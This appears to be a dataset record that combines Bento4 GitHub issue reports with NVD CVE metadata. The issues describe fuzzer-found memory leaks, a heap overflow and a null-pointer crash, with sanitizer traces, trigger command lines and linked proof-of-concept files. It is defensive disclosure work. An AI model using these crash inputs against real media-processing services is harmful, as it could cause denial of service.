I use AFL when fuzzing and got some crashes. ================================================================= ==3780==ERROR: LeakSanitizer: detected memory leaks Direct leak of 48 byte(s) in 1 object(s) allocated from: #0 0x4c470d in operator new(unsigned long) (/home/hjsz/Bento4/cmakebuild/mp4fragment+0x4c470d) #1 0x653b06 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/hjsz/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279:14 SUMMARY: AddressSanitizer: 48 byte(s) leaked in 1 allocation(s). ================================================================= [crash](https://github.com/yangfar/Image/blob/main/crash.zip) **Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale**
There are memory leaks in mp4fragment
https://api.github.com/repos/axiomatic-systems/Bento4/issues/759/comments
0
2022-09-17T08:19:32Z
2023-05-29T02:53:19Z
https://github.com/axiomatic-systems/Bento4/issues/759
1,376,705,591
759
CVE-2022-41847
2022-09-30T05:15:11.957
An issue was discovered in Bento4 1.6.0-639. A memory leak exists in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) in System/StdC/Ap4StdCFileByteStream.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/750" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/759" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/775" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/775
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, I use fuzer to test binary acc2mp4, and found some carshes, which can result binary mp4split crash too. Here are the details. # Bug1 ``` root@d5f4647d38bd:/aac2mp4/aac2mp4# /Bento4/build/aac2mp4 crash1 /dev/null AAC frame [000000]: size = -7, 96000 kHz, 0 ch ================================================================= ==813117==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62d000008400 at pc 0x0000004ad912 bp 0x7ffe2c57b390 sp 0x7ffe2c57ab40 READ of size 4294967287 at 0x62d000008400 thread T0 #0 0x4ad911 in __asan_memcpy /llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 #1 0x4facae in AP4_BitStream::ReadBytes(unsigned char*, unsigned int) /Bento4/Source/C++/Codecs/Ap4BitStream.cpp:192:10 #2 0x4f8485 in main /Bento4/Source/C++/Apps/Aac2Mp4/Aac2Mp4.cpp:142:29 #3 0x7fec98881c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #4 0x41c349 in _start (/Bento4/build/aac2mp4+0x41c349) 0x62d000008400 is located 0 bytes to the right of 32768-byte region [0x62d000000400,0x62d000008400) allocated by thread T0 here: #0 0x4f4638 in operator new[](unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:102 #1 0x4fa30d in AP4_BitStream::AP4_BitStream() /Bento4/Source/C++/Codecs/Ap4BitStream.cpp:45:16 #2 0x7fec98881c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: heap-buffer-overflow /llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy Shadow bytes around the buggy address: 0x0c5a7fff9030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5a7fff9040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5a7fff9050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5a7fff9060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5a7fff9070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c5a7fff9080:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5a7fff9090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5a7fff90a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5a7fff90b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5a7fff90c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5a7fff90d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==813117==ABORTING ``` # Bug2 ``` root@d5f4647d38bd:/aac2mp4/aac2mp4# ./mp4split crash2 no movie found in file ================================================================= ==888268==ERROR: LeakSanitizer: detected memory leaks Direct leak of 48 byte(s) in 1 object(s) allocated from: #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x5de94f in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279:14 Indirect leak of 256 byte(s) in 1 object(s) allocated from: #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x536495 in AP4_Array<unsigned int>::EnsureCapacity(unsigned int) /Bento4/Source/C++/Core/Ap4Array.h:172:25 #2 0x536495 in AP4_Array<unsigned int>::Append(unsigned int const&) /Bento4/Source/C++/Core/Ap4Array.h:252:29 #3 0x536495 in AP4_FtypAtom::AP4_FtypAtom(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4FtypAtom.cpp:57:28 #4 0x50966b in AP4_FtypAtom::Create(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4FtypAtom.h:66:20 #5 0x50966b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:630:20 #6 0x507ec4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #7 0x5076ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #8 0x5350be in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:104:12 #9 0x5357ed in AP4_File::AP4_File(AP4_ByteStream&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:78:5 #10 0x4f841f in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:26 #11 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x507f57 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:242:16 #2 0x5076ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #3 0x5350be in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:104:12 #4 0x5357ed in AP4_File::AP4_File(AP4_ByteStream&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:78:5 #5 0x4f841f in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:26 #6 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 72 byte(s) in 1 object(s) allocated from: #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x4f83f7 in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:22 #2 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 72 byte(s) in 1 object(s) allocated from: #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x509659 in AP4_FtypAtom::Create(unsigned int, AP4_ByteStream&) /Bento4/Source/C++/Core/Ap4FtypAtom.h:66:16 #2 0x509659 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:630:20 #3 0x507ec4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #4 0x5076ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #5 0x5350be in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:104:12 #6 0x5357ed in AP4_File::AP4_File(AP4_ByteStream&, bool) /Bento4/Source/C++/Core/Ap4File.cpp:78:5 #7 0x4f841f in main /Bento4/Source/C++/Apps/Mp4Split/Mp4Split.cpp:258:26 #8 0x7f11ba50dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 48 byte(s) in 2 object(s) allocated from: #0 0x4f45d8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x4fd2d3 in AP4_List<AP4_Atom>::Add(AP4_Atom*) /Bento4/Source/C++/Core/Ap4List.h:160:16 #2 0x4fd2d3 in AP4_AtomParent::AddChild(AP4_Atom*, int) /Bento4/Source/C++/Core/Ap4Atom.cpp:532:29 SUMMARY: AddressSanitizer: 584 byte(s) leaked in 7 allocation(s). ``` # Environment Ubuntu 18.04(docker) clang 12.0.1 clang++ 12.0.1 Bento4 master branch([5b7cc25](https://github.com/axiomatic-systems/Bento4/commit/5b7cc2500d514717a64675fcf631939494c074ce)) # How to reproduce ``` export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -g" export CXXFLAGS="-fsanitize=address -g" mkdir build cd build cmake -DCMAKE_BUILD_TYPE=Release .. make ``` # POC [crash.zip](https://github.com/axiomatic-systems/Bento4/files/9638201/crash.zip) # Credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Yin li,Jiayu Zhao([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) # Notice I find the two bugs not only exist in latest branch but also exist in latest release version Bento4-1.6.0-639. The bug1 is similar to the issuse#363([CVE-2019-8378](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8378)),which means this bug hasn't been fixed now. Thanks for your time!
there are some bugs in Bento4
https://api.github.com/repos/axiomatic-systems/Bento4/issues/775/comments
0
2022-09-24T07:42:46Z
2023-06-26T06:38:57Z
https://github.com/axiomatic-systems/Bento4/issues/775
1,384,568,694
775
CVE-2022-41419
2022-10-03T14:15:22.013
Bento4 v1.6.0-639 was discovered to contain a memory leak via the AP4_Processor::Process function in the mp4encrypt binary.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/766" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/766
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hi, developers of Bento4: I tested the binary mp4encrypt, and a crash incurred, i.e., memory leaks error. The version of Bento4 is the latest (the newest master branch) and the operation system is Ubuntu 18.04.6 LTS (docker). The following is the details. # Details ``` root@c08635047aea:/fuzz-mp4encrypt/mp4encrypt# ./mp4encrypt --method MARLIN-IPMP-ACBC ../out/crashes/id\:000007\,sig\:06\,src\:000001\,op\:flip1\,pos\:14136\,934837 /dev/null WARNING: track ID 1 will not be encrypted WARNING: atom serialized to fewer bytes than declared size ================================================================= ==3055140==ERROR: LeakSanitizer: detected memory leaks Direct leak of 104 byte(s) in 1 object(s) allocated from: #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f) #3 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c) #4 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 3328 byte(s) in 2 object(s) allocated from: #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x5b2921 in AP4_MarlinIpmpEncryptingProcessor::Initialize(AP4_AtomParent&, AP4_ByteStream&, AP4_Processor::ProgressListener*) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x5b2921) #3 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f) #4 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c) #5 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 1024 byte(s) in 1 object(s) allocated from: #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x8b62f9 in AP4_Expandable::Write(AP4_ByteStream&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x8b62f9) #3 0x5b2540 in AP4_MarlinIpmpEncryptingProcessor::Initialize(AP4_AtomParent&, AP4_ByteStream&, AP4_Processor::ProgressListener*) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x5b2540) #4 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f) #5 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c) #6 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 224 byte(s) in 5 object(s) allocated from: #0 0x9a1c90 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7fda31f4c297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x64923f in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x64923f) #3 0x42128c in main (/fuzz-mp4encrypt/mp4encrypt/mp4encrypt+0x42128c) #4 0x7fda31110c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: 4680 byte(s) leaked in 9 allocation(s). ``` # POC [mp4encrypt_poc1.zip](https://github.com/axiomatic-systems/Bento4/files/9603334/mp4encrypt_poc1.zip) # Environment Ubuntu 18.04.6 LTS (docker) clang 12.0.1 clang++ 12.0.1 Bento4 master branch(5b7cc25) && Bento4 release version([1.6.0-639](https://www.bok.net/Bento4/binaries/Bento4-SDK-1-6-0-639.x86_64-unknown-linux.zip)) # Credit Xudong Cao ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory) Thank you for your time!
Detected memory leaks in mp4encrypt
https://api.github.com/repos/axiomatic-systems/Bento4/issues/766/comments
0
2022-09-20T01:45:02Z
2023-06-26T05:57:20Z
https://github.com/axiomatic-systems/Bento4/issues/766
1,378,706,570
766
CVE-2022-41423
2022-10-03T14:15:22.743
Bento4 v1.6.0-639 was discovered to contain a segmentation violation in the mp4fragment component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/767" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/767
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hi there, I use my fuzzer for fuzzing the binary mp4fragment, the version of Bento4 is the latest (the newest master branch) and the operation system is Ubuntu 18.04.6 LTS (docker) and this binary crashes with the following. # Details ``` root@4e3b7f9edc0d:/mp4box/mp4fragment# ./mp4fragment ../out/crashes/id\:000000\,sig\:06\,src\:000008\,op\:flip1\,pos\:31325\,4970731 /dev/null unable to autodetect fragment duration, using default AddressSanitizer:DEADLYSIGNAL ================================================================= ==750986==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f5fc13c0306 bp 0x7ffe16f62f30 sp 0x7ffe16f626c8 T0) ==750986==The signal is caused by a READ memory access. ==750986==Hint: address points to the zero page. #0 0x7f5fc13c0306 (/lib/x86_64-linux-gnu/libc.so.6+0xb1306) #1 0x94da2c in __interceptor_strlen.part.36 /llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:370 #2 0x6ec0c2 in AP4_TrakAtom::AP4_TrakAtom(AP4_SampleTable*, unsigned int, char const*, unsigned int, unsigned long long, unsigned long long, unsigned long long, unsigned int, unsigned long long, unsigned short, char const*, unsigned int, unsigned int, unsigned short, unsigned short, int const*) (/mp4box/mp4fragment/mp4fragment+0x6ec0c2) #3 0x432bbc in main (/mp4box/mp4fragment/mp4fragment+0x432bbc) #4 0x7f5fc1330c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x407cd9 in _start (/mp4box/mp4fragment/mp4fragment+0x407cd9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xb1306) ==750986==ABORTING ``` # POC [POC-Mp4fragment-1.zip](https://github.com/axiomatic-systems/Bento4/files/9617496/POC-Mp4fragment-1.zip) # Environment Ubuntu 18.04.6 LTS (docker) clang 12.0.1 clang++ 12.0.1 Bento4 master branch(5b7cc25) && Bento4 release version([1.6.0-639](https://www.bok.net/Bento4/binaries/Bento4-SDK-1-6-0-639.x86_64-unknown-linux.zip)) # Credit Xudong Cao ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Jiayuan Zhang ([NCNIPC of China](http://www.nipc.org.cn/)), (Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)) Thank you for your time!
From mp4fragment: SEGV on unknown address 0x000000000000
https://api.github.com/repos/axiomatic-systems/Bento4/issues/767/comments
0
2022-09-21T14:23:53Z
2023-06-26T05:26:52Z
https://github.com/axiomatic-systems/Bento4/issues/767
1,381,022,528
767
CVE-2022-41424
2022-10-03T14:15:23.097
Bento4 v1.6.0-639 was discovered to contain a memory leak via the AP4_SttsAtom::Create function in mp42hls.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/768" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/768
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Summary Hi there, I tested the binary mp42hls, the version of Bento4 is the latest (the newest master branch) and the operation system is Ubuntu 18.04.6 LTS (docker) and this binary crash with the following. # Details ``` root@2e47aa8b3277:/test_mp42hls# ./mp42hls --audio-track-id 2 ./mp42hls\-poc\-1 ERROR: audio track ID 2 not found ================================================================= ==4379==ERROR: LeakSanitizer: detected memory leaks Indirect leak of 512 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x6d951f in AP4_SttsAtom::Create(unsigned int, AP4_ByteStream&) (/test_mp42hls/mp42hls+0x6d951f) #3 0x4bb0c3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4bb0c3) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #7 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #8 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #9 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #10 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #11 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #12 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #13 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #14 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #15 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #16 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #17 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #18 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 324 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x6d10ef in AP4_StszAtom::Create(unsigned int, AP4_ByteStream&) (/test_mp42hls/mp42hls+0x6d10ef) #3 0x4bae13 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4bae13) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #7 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #8 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long 